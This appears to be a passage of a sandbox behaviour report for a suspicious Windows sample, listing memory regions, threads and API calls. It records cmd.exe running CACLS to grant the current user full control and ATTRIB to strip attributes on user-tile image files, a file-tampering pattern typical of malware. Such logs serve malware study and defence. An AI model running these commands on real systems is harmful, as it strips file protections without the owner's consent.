00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27614 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27615 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27616 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27617 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 27618 start_va = 0x960000 end_va = 0x968fff entry_point = 0x960000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 27619 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27620 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27621 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27622 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27623 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27624 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" 
Region: id = 27625 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27626 start_va = 0x90000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 27627 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 27628 start_va = 0x230000 end_va = 0x296fff entry_point = 0x230000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27629 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27630 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27631 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27632 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27633 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27634 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = 
"\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27635 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 587 os_tid = 0x9ac Thread: id = 588 os_tid = 0x9bc Process: id = "414" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d80" os_pid = "0xabc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "412" os_parent_pid = "0x9a8" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27636 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27637 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27638 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27639 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 27640 start_va = 0x7d0000 end_va = 0x7d6fff entry_point = 0x7d0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 27641 
start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27642 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27643 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27644 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27645 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27646 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27647 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27648 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27649 start_va = 0x1b0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 27650 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 27651 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 27652 start_va = 0x75540000 
end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27653 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27654 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27655 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27656 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27657 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27658 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27659 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27660 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: 
"c:\\windows\\system32\\sechost.dll") Region: id = 27661 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27662 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27663 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 27664 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27665 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 589 os_tid = 0x9b8 Process: id = "415" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c40" os_pid = "0x5dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], 
"LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27666 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27667 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27668 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27669 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 27670 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 27671 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27672 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27673 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27674 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 27675 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27676 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27677 start_va = 0x20000 
end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27678 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27679 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 27680 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 27681 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 27682 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27683 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27684 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27685 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27686 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: 
"c:\\windows\\system32\\user32.dll") Region: id = 27687 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27688 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27689 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27690 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 27691 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27692 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27693 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 27694 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 27695 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 27696 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 27697 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = 
"" Region: id = 27698 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 27699 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 27700 start_va = 0x1350000 end_va = 0x161efff entry_point = 0x1350000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 590 os_tid = 0x9d8 [0189.626] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fb24 | out: lpSystemTimeAsFileTime=0x20fb24*(dwLowDateTime=0xa5ecd780, dwHighDateTime=0x1d440a9)) [0189.626] GetCurrentProcessId () returned 0x5dc [0189.626] GetCurrentThreadId () returned 0x9d8 [0189.626] GetTickCount () returned 0x360a5 [0189.626] QueryPerformanceCounter (in: lpPerformanceCount=0x20fb1c | out: lpPerformanceCount=0x20fb1c*=24641581737) returned 1 [0189.627] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0189.627] __set_app_type (_Type=0x1) [0189.627] __p__fmode () returned 0x76b331f4 [0189.627] __p__commode () returned 0x76b331fc [0189.627] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0189.628] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0189.628] GetCurrentThreadId () returned 0x9d8 [0189.628] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9d8) returned 0x38 [0189.628] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0189.628] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0189.628] SetThreadUILanguage (LangId=0x0) returned 0x409 [0189.628] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, 
HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0189.628] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fab4 | out: phkResult=0x20fab4*=0x0) returned 0x2 [0189.628] VirtualQuery (in: lpAddress=0x20faeb, lpBuffer=0x20fa84, dwLength=0x1c | out: lpBuffer=0x20fa84*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0189.628] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fa84, dwLength=0x1c | out: lpBuffer=0x20fa84*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0189.628] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fa84, dwLength=0x1c | out: lpBuffer=0x20fa84*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0189.628] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fa84, dwLength=0x1c | out: lpBuffer=0x20fa84*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0189.628] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fa84, dwLength=0x1c | out: lpBuffer=0x20fa84*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0189.628] GetConsoleOutputCP () returned 0x1b5 [0189.628] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0189.628] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0189.628] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.628] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0189.629] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.629] GetConsoleMode (in: hConsoleHandle=0x7, 
lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0189.629] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.629] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0189.629] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.629] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0189.629] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.629] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0189.629] GetEnvironmentStringsW () returned 0x3e0308* [0189.629] FreeEnvironmentStringsW (penv=0x3e0308) returned 1 [0189.630] GetEnvironmentStringsW () returned 0x3e0308* [0189.630] FreeEnvironmentStringsW (penv=0x3e0308) returned 1 [0189.630] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ea24 | out: phkResult=0x20ea24*=0x40) returned 0x0 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x0, lpData=0x20ea30*=0xb8, lpcbData=0x20ea28*=0x1000) returned 0x2 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x4, lpData=0x20ea30*=0x1, lpcbData=0x20ea28*=0x4) returned 0x0 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x0, lpData=0x20ea30*=0x1, lpcbData=0x20ea28*=0x1000) returned 0x2 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x4, lpData=0x20ea30*=0x0, lpcbData=0x20ea28*=0x4) returned 0x0 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, 
lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x4, lpData=0x20ea30*=0x40, lpcbData=0x20ea28*=0x4) returned 0x0 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x4, lpData=0x20ea30*=0x40, lpcbData=0x20ea28*=0x4) returned 0x0 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x0, lpData=0x20ea30*=0x40, lpcbData=0x20ea28*=0x1000) returned 0x2 [0189.630] RegCloseKey (hKey=0x40) returned 0x0 [0189.630] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ea24 | out: phkResult=0x20ea24*=0x40) returned 0x0 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x0, lpData=0x20ea30*=0x40, lpcbData=0x20ea28*=0x1000) returned 0x2 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x4, lpData=0x20ea30*=0x1, lpcbData=0x20ea28*=0x4) returned 0x0 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x0, lpData=0x20ea30*=0x1, lpcbData=0x20ea28*=0x1000) returned 0x2 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x4, lpData=0x20ea30*=0x0, lpcbData=0x20ea28*=0x4) returned 0x0 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x4, 
lpData=0x20ea30*=0x9, lpcbData=0x20ea28*=0x4) returned 0x0 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x4, lpData=0x20ea30*=0x9, lpcbData=0x20ea28*=0x4) returned 0x0 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x0, lpData=0x20ea30*=0x9, lpcbData=0x20ea28*=0x1000) returned 0x2 [0189.630] RegCloseKey (hKey=0x40) returned 0x0 [0189.630] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886397 [0189.630] srand (_Seed=0x5b886397) [0189.630] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\"" [0189.630] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\"" [0189.631] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0189.631] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0189.631] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0189.631] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
